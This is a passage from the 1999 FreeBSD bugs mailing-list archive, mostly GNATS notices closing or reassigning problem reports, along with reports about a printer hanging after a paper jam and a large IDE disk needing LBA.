when this printer last had a paper jam in all the years i have it (if ever, it is _old_, ink jet printers weren't even invented when i got it i believe), but one day it had to happen i guess... Anyway i hit offline, teared off the offending page (i said the printer is old :), killed the job and powecycled the printer (there's no other way to reset it i believe), but when i then sent the job again the printer only got garbage. so i had to hit offline again... Well turned out the filter processes (gs...) from the jammed job were still around, and i couldn't kill them either because they were hanging on the (now offline again) printer device. So the only fix seemed to be a reboot. :/ (Or is there some way for a device on the parallel port to indicate a reset/poweroff that this printer just doesn't use?) >How-To-Repeat: Switch offline and reset printer and kill the job when the filter isn't yet finished sending data? >Fix: ?? Maybe add a `wakeup everyone waiting and flush and ignore all output until close' ioctl to the lpt driver that lprm could use when killing an active job? >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Dec 17 12: 0:40 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 8E504157E5; Fri, 17 Dec 1999 12:00:39 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA81158; Fri, 17 Dec 1999 12:00:39 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Fri, 17 Dec 1999 12:00:39 -0800 (PST) From: Message-Id: <199912172000.MAA81158@freefall.freebsd.org> To: andre.albsmeier@mchp.siemens.de, steve@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/12496: yppush broken when pushing to 2 or more slaves Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: yppush broken when pushing to 2 or more slaves State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Fri Dec 17 11:59:46 PST 1999 State-Changed-Why: Originator stated that he is no longer seeing the problem mentioned in this PR. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Dec 17 12:23:43 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 90A6214D31; Fri, 17 Dec 1999 12:23:40 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA83319; Fri, 17 Dec 1999 12:23:40 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Fri, 17 Dec 1999 12:23:40 -0800 (PST) From: Message-Id: <199912172023.MAA83319@freefall.freebsd.org> To: steve@FreeBSD.org, gnats-admin@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: pending/15486: Attempt to write to a "write-prot" floppy causes system hang Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Attempt to write to a "write-prot" floppy causes system hang Responsible-Changed-From-To: gnats-admin->freebsd-bugs Responsible-Changed-By: steve Responsible-Changed-When: Fri Dec 17 12:22:15 PST 1999 Responsible-Changed-Why: Misfiled PR. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Dec 17 12:37:31 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 71ED914FB4; Fri, 17 Dec 1999 12:37:30 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA84448; Fri, 17 Dec 1999 12:37:30 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Fri, 17 Dec 1999 12:37:30 -0800 (PST) From: Message-Id: <199912172037.MAA84448@freefall.freebsd.org> To: card@csi.uvsq.fr, steve@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: conf/12984: /etc/rc* does not contain any support for dhclient Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: /etc/rc* does not contain any support for dhclient State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Fri Dec 17 12:36:32 PST 1999 State-Changed-Why: A similar patch has already been committed to both -current and -stable. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Dec 17 12:38:35 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id D89A614D69; Fri, 17 Dec 1999 12:38:34 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA84601; Fri, 17 Dec 1999 12:38:34 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Fri, 17 Dec 1999 12:38:34 -0800 (PST) From: Message-Id: <199912172038.MAA84601@freefall.freebsd.org> To: abur@softchoice.com, steve@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/13752: "tl0: adapter check: 180005" mesages keep coming up from kernel Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: "tl0: adapter check: 180005" mesages keep coming up from kernel State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Fri Dec 17 12:38:22 PST 1999 State-Changed-Why: Duplicate of kern/13757. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Dec 17 12:39:30 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 472ED14C93; Fri, 17 Dec 1999 12:39:29 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA84739; Fri, 17 Dec 1999 12:39:29 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Fri, 17 Dec 1999 12:39:29 -0800 (PST) From: Message-Id: <199912172039.MAA84739@freefall.freebsd.org> To: bertram@gummo.bbb.sub.org, steve@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: i386/14333: AHA-1542A not supported by FreeBSD 3.x ("compensating") Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: AHA-1542A not supported by FreeBSD 3.x ("compensating") State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Fri Dec 17 12:39:07 PST 1999 State-Changed-Why: Duplicate of i386/14334. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Dec 17 12:43:52 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id E2B1114CD2; Fri, 17 Dec 1999 12:43:51 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA85356; Fri, 17 Dec 1999 12:43:51 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Fri, 17 Dec 1999 12:43:51 -0800 (PST) From: Message-Id: <199912172043.MAA85356@freefall.freebsd.org> To: shin@nd.net.fujitsu.co.jp, steve@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/15058: Re: kernel with INET6 doesn't build Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Re: kernel with INET6 doesn't build State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Fri Dec 17 12:43:15 PST 1999 State-Changed-Why: Followup to another PR. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Dec 17 12:44:22 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 305BB15826; Fri, 17 Dec 1999 12:44:21 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA85453; Fri, 17 Dec 1999 12:44:21 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Fri, 17 Dec 1999 12:44:21 -0800 (PST) From: Message-Id: <199912172044.MAA85453@freefall.freebsd.org> To: assar@stacken.kth.se, steve@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/15061: Re: kernel with INET6 doesn't build Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Re: kernel with INET6 doesn't build State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Fri Dec 17 12:44:01 PST 1999 State-Changed-Why: Followup to another PR. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Dec 17 12:47:26 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 83D8F15719; Fri, 17 Dec 1999 12:47:25 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA85896; Fri, 17 Dec 1999 12:47:25 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Fri, 17 Dec 1999 12:47:25 -0800 (PST) From: Message-Id: <199912172047.MAA85896@freefall.freebsd.org> To: steve@FreeBSD.org, gnats-admin@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: pending/14953: mtrace commands are redundant Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: mtrace commands are redundant Responsible-Changed-From-To: gnats-admin->freebsd-bugs Responsible-Changed-By: steve Responsible-Changed-When: Fri Dec 17 12:46:32 PST 1999 Responsible-Changed-Why: Misfiled PR. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Dec 17 12:49:42 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 8FB4B14CAA; Fri, 17 Dec 1999 12:49:41 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA86141; Fri, 17 Dec 1999 12:49:41 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Fri, 17 Dec 1999 12:49:41 -0800 (PST) From: Message-Id: <199912172049.MAA86141@freefall.freebsd.org> To: leif@neland.dk, steve@FreeBSD.org, gnats-admin@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: pending/15449: checking for signal handlers reset automatically hangs in configure when making pike Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: checking for signal handlers reset automatically hangs in configure when making pike State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Fri Dec 17 12:47:57 PST 1999 State-Changed-Why: Daniel Eischen committed a fix to libc_r that seems to have corrected this. Responsible-Changed-From-To: gnats-admin->freebsd-bugs Responsible-Changed-By: steve Responsible-Changed-When: Fri Dec 17 12:47:57 PST 1999 Responsible-Changed-Why: Misfiled PR. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Dec 17 12:50:25 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id D98AE1585D; Fri, 17 Dec 1999 12:50:23 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA86258; Fri, 17 Dec 1999 12:50:23 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Fri, 17 Dec 1999 12:50:23 -0800 (PST) From: Message-Id: <199912172050.MAA86258@freefall.freebsd.org> To: steve@FreeBSD.org, gnats-admin@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: pending/15483: mount won't mount / after fsck repairing it on boot Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: mount won't mount / after fsck repairing it on boot Responsible-Changed-From-To: gnats-admin->freebsd-bugs Responsible-Changed-By: steve Responsible-Changed-When: Fri Dec 17 12:49:55 PST 1999 Responsible-Changed-Why: Misfiled PR. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Dec 17 12:51:28 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 8C98615867; Fri, 17 Dec 1999 12:51:27 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA86378; Fri, 17 Dec 1999 12:51:27 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Fri, 17 Dec 1999 12:51:27 -0800 (PST) From: Message-Id: <199912172051.MAA86378@freefall.freebsd.org> To: steve@FreeBSD.org, gnats-admin@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: pending/15508: disk usage after "strip" is wrong Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: disk usage after "strip" is wrong Responsible-Changed-From-To: gnats-admin->freebsd-bugs Responsible-Changed-By: steve Responsible-Changed-When: Fri Dec 17 12:50:36 PST 1999 Responsible-Changed-Why: Misfiled PR. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Dec 17 12:51:57 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 2256F157CB; Fri, 17 Dec 1999 12:51:56 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA86457; Fri, 17 Dec 1999 12:51:56 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Fri, 17 Dec 1999 12:51:56 -0800 (PST) From: Message-Id: <199912172051.MAA86457@freefall.freebsd.org> To: steve@FreeBSD.org, gnats-admin@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/15492: Patch to fixup bridging support for 2.2-STABLE Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Patch to fixup bridging support for 2.2-STABLE Responsible-Changed-From-To: gnats-admin->freebsd-bugs Responsible-Changed-By: steve Responsible-Changed-When: Fri Dec 17 12:51:43 PST 1999 Responsible-Changed-Why: Misfiled PR. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Dec 17 12:52:17 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id EA583158F2; Fri, 17 Dec 1999 12:52:15 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA86544; Fri, 17 Dec 1999 12:52:15 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Fri, 17 Dec 1999 12:52:15 -0800 (PST) From: Message-Id: <199912172052.MAA86544@freefall.freebsd.org> To: steve@FreeBSD.org, gnats-admin@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/15493: Patch to enable bridging support for if_cs Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Patch to enable bridging support for if_cs Responsible-Changed-From-To: gnats-admin->freebsd-bugs Responsible-Changed-By: steve Responsible-Changed-When: Fri Dec 17 12:52:02 PST 1999 Responsible-Changed-Why: Misfiled PR. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Dec 17 12:55:16 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 41D1C1579A; Fri, 17 Dec 1999 12:55:15 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA86835; Fri, 17 Dec 1999 12:55:15 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Fri, 17 Dec 1999 12:55:15 -0800 (PST) From: Message-Id: <199912172055.MAA86835@freefall.freebsd.org> To: bmilekic@dsuper.net, steve@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/15292: Re: Panic in sorecieve() due to NULL mbuf pointer Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Re: Panic in sorecieve() due to NULL mbuf pointer State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Fri Dec 17 12:54:21 PST 1999 State-Changed-Why: Intended as a followup to kern/10872. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Dec 17 13: 0:22 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id C0F9015786; Fri, 17 Dec 1999 13:00:20 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA87430; Fri, 17 Dec 1999 13:00:19 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Fri, 17 Dec 1999 13:00:19 -0800 (PST) From: Message-Id: <199912172100.NAA87430@freefall.freebsd.org> To: bmilekic@dsuper.net, steve@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/15293: Re: mbuf shortage and allocation with M_WAIT results in a panic Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Re: mbuf shortage and allocation with M_WAIT results in a panic State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Fri Dec 17 12:59:59 PST 1999 State-Changed-Why: Intended as a followup to kern/14042. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Dec 17 13:24:45 1999 Delivered-To: freebsd-bugs@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 718) id E7A2014E20; Fri, 17 Dec 1999 13:24:43 -0800 (PST) To: steve@spvi.com, jasone@FreeBSD.ORG, freebsd-bugs@FreeBSD.ORG From: jasone@FreeBSD.ORG Subject: Re: misc/9903 Message-Id: <19991217212443.E7A2014E20@hub.freebsd.org> Date: Fri, 17 Dec 1999 13:24:43 -0800 (PST) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: thread enabled program can't use popen/system more than once when called from cron State-Changed-From-To: open->closed State-Changed-By: jasone State-Changed-When: Fri Dec 17 13:23:07 PST 1999 State-Changed-Why: deischen's fixes to libc_r with regard to thread wakeup and wait4() on 16 December 1999 resolve this PR. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Dec 17 14: 6:18 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id C528314DA6; Fri, 17 Dec 1999 14:06:16 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id OAA93184; Fri, 17 Dec 1999 14:06:16 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Fri, 17 Dec 1999 14:06:16 -0800 (PST) From: Message-Id: <199912172206.OAA93184@freefall.freebsd.org> To: steve@FreeBSD.org, gnats-admin@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: pending/15542: de suddenly stops working Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: de suddenly stops working Responsible-Changed-From-To: gnats-admin->freebsd-bugs Responsible-Changed-By: steve Responsible-Changed-When: Fri Dec 17 14:05:53 PST 1999 Responsible-Changed-Why: Misfiled PR. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Dec 17 15:50: 6 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id AC81315052 for ; Fri, 17 Dec 1999 15:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA00116; Fri, 17 Dec 1999 15:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 3AAF414A24; Fri, 17 Dec 1999 15:41:45 -0800 (PST) Message-Id: <19991217234145.3AAF414A24@hub.freebsd.org> Date: Fri, 17 Dec 1999 15:41:45 -0800 (PST) From: tod@quay.com To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: misc/15546: Need to enable LBA flag for large IDE disks (40GB Maxtor 94098U8) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15546 >Category: misc >Synopsis: Need to enable LBA flag for large IDE disks (40GB Maxtor 94098U8) >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Fri Dec 17 15:50:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Tod Oace >Release: 3.3 Stable >Organization: Quay Communique' >Environment: FreeBSD mist.quay.com 3.3-RELEASE FreeBSD 3.3-RELEASE #0: Fri Dec 17 14:11:45 PST 1999 tod@mist.quay.com:/usr/src/sys/compile/INSIDE i386 >Description: I had a bad experience installing my new 40GB Maxtor hard drive, but ultimately figured out a work-around. I'm submitting this to try and help others avoid the experience I had. The first problem I had was with my Award BIOS getting stuck in POST. I obtained a BIOS upgrade which didn't help. But disabling the drive in the BIOS setup did work since it's not my boot drive, and FreeBSD does a good job of finding it. The boot problem is mentioned at: http://www.maxtor.com/satisfaction/32gbissues.html. Once I booted FreeBSD with the new drive I made the fdisk and FreeBSD labels and then newfs'd. Newsf almost finished (did all the counting up) but died near the end with a "Read-only file system" error. Fsck and mount attempts failed complaining about lack of a superblock. FreeBSD seems to have a 16 bit cylinder numbering limitation which I believe is what was causing the mysterious problem. The BIOS was reporting more than 65536 cylinders, but FreeBSD's fdisk wasn't allowing it. And while fdisk made a warning about this and computed LBA sizing for the disk, newfs couldn't complete with it. Finally I somehow realized that FreeBSD needed to start using LBA sizing for that drive and I found the kernel configuration options for that, and now everything is great again. So... To help other people avoid this, and I do think other people will be running into this soon, I think the fdisk should suggest that LBA be enabled within the kernel. It should do this when it complains about CHS size. Better yet, FreeBSD should deal with more than 16 bits of cylinder numbering. >How-To-Repeat: Install a Maxtor 40GB IDE drive without enabling LBA in FreeBSD's driver, create a label with one filesystem for the whole drive and attempt to newfs. Newfs will almost finish and then die with "Read-only file system". >Fix: Enable LBA option for the drive in the FreeBSD kernel configuration. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Dec 17 17: 1:48 1999 Delivered-To: freebsd-bugs@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 718) id B0F7914D6D; Fri, 17 Dec 1999 17:01:47 -0800 (PST) To: rse@engelschall.com, jasone@FreeBSD.ORG, freebsd-bugs@FreeBSD.ORG From: jasone@FreeBSD.ORG Subject: Re: kern/11982 Message-Id: <19991218010147.B0F7914D6D@hub.freebsd.org> Date: Fri, 17 Dec 1999 17:01:47 -0800 (PST) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Three cleanup fixes for uthreads State-Changed-From-To: open->closed State-Changed-By: jasone State-Changed-When: Fri Dec 17 17:00:55 PST 1999 State-Changed-Why: The provided patch was applied. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Dec 17 17:49:10 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 1DA8514F0B; Fri, 17 Dec 1999 17:49:09 -0800 (PST) (envelope-from fenner@FreeBSD.org) Received: (from fenner@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id RAA07977; Fri, 17 Dec 1999 17:49:08 -0800 (PST) (envelope-from fenner@FreeBSD.org) Date: Fri, 17 Dec 1999 17:49:08 -0800 (PST) From: Message-Id: <199912180149.RAA07977@freefall.freebsd.org> To: kvugane@juniper.net, fenner@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/14953: mtrace commands are redundant Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: mtrace commands are redundant State-Changed-From-To: open->closed State-Changed-By: fenner State-Changed-When: Fri Dec 17 17:48:39 PST 1999 State-Changed-Why: This appears to be an internal Juniper PR, sent to FreeBSD by mistake. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Dec 17 19:14:38 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from brainy.cs.usm.maine.edu (brainy.cs.usm.maine.edu [130.111.131.37]) by hub.freebsd.org (Postfix) with ESMTP id 10E7D14EF1; Fri, 17 Dec 1999 19:14:36 -0800 (PST) (envelope-from bryant@cs.usm.maine.edu) Received: from snowwhite.cs.usm.maine.edu (snowwhite.cs.usm.maine.edu [130.111.131.70]) by brainy.cs.usm.maine.edu (8.9.2/8.9.2) with SMTP id WAA20992; Fri, 17 Dec 1999 22:17:46 -0500 (EST) Received: from localhost by snowwhite.cs.usm.maine.edu (5.65v4.0/1.1.19.2/11Nov98-0148PM) id AA14543; Fri, 17 Dec 1999 22:26:59 -0500 Date: Fri, 17 Dec 1999 22:26:58 -0500 (EST) From: That Guy To: deischen@FreeBSD.org Cc: freebsd-bugs@FreeBSD.org Subject: Re: bin/10992: pthread_kill() doesn't deliver signals to threads in blocking syscall In-Reply-To: <199912171155.DAA32754@freefall.freebsd.org> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Thanks for the heads-up. I personally won't be able to provide any feedback, however, since I no longer have access to a FreeBSD machine. Also, the program I was porting (Citadel/UX) no longer uses pthread_kill, so I'm told. So at least as far as we're concerned, you may as well close the PR now... I'm sure your bugfix must be correct. :-) On Fri, 17 Dec 1999 deischen@FreeBSD.org wrote: > Synopsis: pthread_kill() doesn't deliver signals to threads in blocking > syscall > > State-Changed-From-To: open->analyzed > State-Changed-By: deischen > State-Changed-When: Fri Dec 17 03:54:23 PST 1999 > State-Changed-Why: > This should be fixed in -current. I'll wait a week or so, then > close out the PR if I don't get any feedback. > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Dec 17 19:40: 7 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id C8EA914FE4 for ; Fri, 17 Dec 1999 19:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id TAA17582; Fri, 17 Dec 1999 19:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Fri, 17 Dec 1999 19:40:01 -0800 (PST) Message-Id: <199912180340.TAA17582@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "Alan Clegg" Subject: Re: kern/12022: System clock timewarps Reply-To: "Alan Clegg" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/12022; it has been noted by GNATS. From: "Alan Clegg" To: freebsd-gnats-submit@freebsd.org, dwhite@pond.net Cc: Subject: Re: kern/12022: System clock timewarps Date: 18 Dec 1999 03:39:31 -0000 Note that the above code fragment should have had: +#else instead of +else AlanC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Dec 17 19:50: 4 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id BFFFA14F82 